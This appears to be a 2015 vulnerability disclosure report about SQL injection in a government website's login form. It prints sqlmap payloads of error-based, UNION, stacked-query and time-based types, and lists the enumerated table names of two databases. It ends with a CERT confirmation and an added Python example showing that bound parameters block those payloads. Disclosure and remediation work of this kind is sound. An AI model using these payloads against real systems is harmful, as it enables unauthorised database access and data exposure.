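2015-07-10: Details sent to the vendor; awaiting vendor handling
2015-07-14: Vendor confirmed; details disclosed to the vendor only
2015-07-24: Details disclosed to core white hats and relevant domain experts
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to intern white hats
2015-08-28: Details disclosed to the public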
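I submitted this before, but it did not pass review, perhaps because I only gave the databases and did not list the tables. Quite a lot of related information is involved.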
Place: POST
Parameter: UserName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: UserName=admin' AND 9534=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(121)+CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (9534=9534) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(101)+CHAR(100)+CHAR(119)+CHAR(58))) AND 'Nsxl'='Nsxl&PWD=sss

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: UserName=admin' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(110)+CHAR(121)+CHAR(103)+CHAR(58)+CHAR(83)+CHAR(117)+CHAR(70)+CHAR(80)+CHAR(68)+CHAR(66)+CHAR(87)+CHAR(80)+CHAR(106)+CHAR(71)+CHAR(58)+CHAR(101)+CHAR(100)+CHAR(119)+CHAR(58), NULL, NULL, NULL-- &PWD=sss

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: UserName=admin'; WAITFOR DELAY '0:0:5';--&PWD=sss

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: UserName=admin' WAITFOR DELAY '0:0:5'--&PWD=sss
Last time I only provided these few databases, and I stopped there without going deeper.
This time I went further.
Database: Northwind
[32 tables]
+--------------------------------------+
| dbo.Categories                       |
| dbo.CustomerCustomerDemo             |
| dbo.CustomerDemographics             |
| dbo.Customers                        |
| dbo.EmployeeTerritories              |
| dbo.Employees                        |
| dbo.Invoices                         |
| dbo.Region                           |
| dbo.Shippers                         |
| dbo.Suppliers                        |
| dbo.Territories                      |
| dbo.[Alphabetical list of products]  |
| dbo.[Category Sales for 1997]        |
| dbo.[Current Product List]           |
| dbo.[Customer and Suppliers by City] |
| dbo.[Order Details Extended]         |
| dbo.[Order Details Extended]         |
| dbo.[Order Subtotals]                |
| dbo.[Orders Qry]                     |
| dbo.[Orders Qry]                     |
| dbo.[Product Sales for 1997]         |
| dbo.[Products Above Average Price]   |
| dbo.[Products Above Average Price]   |
| dbo.[Products by Category]           |
| dbo.[Quarterly Orders]               |
| dbo.[Sales Totals by Amount]         |
| dbo.[Sales by Category]              |
| dbo.[Summary of Sales by Quarter]    |
| dbo.[Summary of Sales by Year]       |
| dbo.dtproperties                     |
| dbo.sysconstraints                   |
| dbo.syssegments                      |
+--------------------------------------+
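You can see a lot of related information: annual sales figures, product prices, employees. I think this is enough to prove how important this hole is. I won't go into the contents of the tables; after all, it is a government site.
Below are the tables of another relatively important database.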
Database: nx_lyt
[32 tables]
+---------------------+
| dbo.Admin           |
| dbo.Affiche         |
| dbo.Article         |
| dbo.ArticleClass    |
| dbo.Cities          |
| dbo.Counter         |
| dbo.Customers       |
| dbo.D99_CMD         |
| dbo.D99_REG         |
| dbo.Depart          |
| dbo.Link            |
| dbo.Order_Titles    |
| dbo.Pop_window      |
| dbo.Public_news     |
| dbo.Userandip       |
| dbo.Vote            |
| dbo.WebCount        |
| dbo.X_4401          |
| dbo.X_5512          |
| dbo.X_7508          |
| dbo.Zzday           |
| dbo.[nxfor.D99_Tmp] |
| dbo.comd_list       |
| dbo.dtproperties    |
| dbo.form            |
| dbo.link_tu         |
| dbo.quhua           |
| dbo.qushu           |
| dbo.sysconstraints  |
| dbo.syssegments     |
| dbo.vote_class      |
| dbo.vote_vote       |
+---------------------+
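This should pass now, right, dear reviewers?
Filtering
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-07-14 16:41
CNVD has confirmed the situation described and forwarded it, through CNCERT, to the Ningxia branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet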
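The finding above is an injectable UserName field in a login POST. The following is an added example, not part of the original report or the site's code, that contrasts a login lookup built by string concatenation with the same lookup using a bound parameter, fed with two UserName values taken from the sqlmap output. It assumes Python's sqlite3 as a stand-in for SQL Server, and the Admin table layout, function names and sample password are hypothetical.

```python
import hashlib
import hmac
import os
import sqlite3

def _hash(pwd, salt):
    return hashlib.pbkdf2_hmac("sha256", pwd.encode(), salt, 100_000)

def make_db():
    # Constructed stand-in: sqlite3 replaces SQL Server, and the Admin table
    # layout and the sample password are assumptions, not data from the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Admin (UserName TEXT PRIMARY KEY, Salt BLOB, PwdHash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO Admin VALUES (?, ?, ?)",
               ("admin", salt, _hash("constructed-password", salt)))
    return db

def _check(row, pwd):
    return row is not None and hmac.compare_digest(_hash(pwd, row[0]), row[1])

def login_concatenated(db, user_name, pwd):
    # "Before" form: the POST value is spliced into the statement text.
    sql = "SELECT Salt, PwdHash FROM Admin WHERE UserName = '" + user_name + "'"
    return _check(db.execute(sql).fetchone(), pwd)

def login_bound(db, user_name, pwd):
    # Hardened form: the value is sent as a bound parameter, never as SQL text.
    sql = "SELECT Salt, PwdHash FROM Admin WHERE UserName = ?"
    return _check(db.execute(sql, (user_name,)).fetchone(), pwd)

def breaks_statement(db, user_name):
    # True when the value changes how the concatenated statement parses,
    # i.e. the quote in the input closed the string literal early.
    try:
        login_concatenated(db, user_name, "sss")
        return False
    except (sqlite3.Error, sqlite3.Warning):
        return True

# UserName values copied from the sqlmap output in the report.
REPORT_VALUES = ["admin' WAITFOR DELAY '0:0:5'--",
                 "admin'; WAITFOR DELAY '0:0:5';--"]

if __name__ == "__main__":
    db = make_db()
    for value in REPORT_VALUES:
        print(repr(value), breaks_statement(db, value), login_bound(db, value, "sss"))
```

sqlite3 rejects the altered statements because it does not know WAITFOR and refuses a second statement in one call; SQL Server accepts them, which is what the sqlmap output records. With the bound parameter the same values are only compared as user names and match nothing.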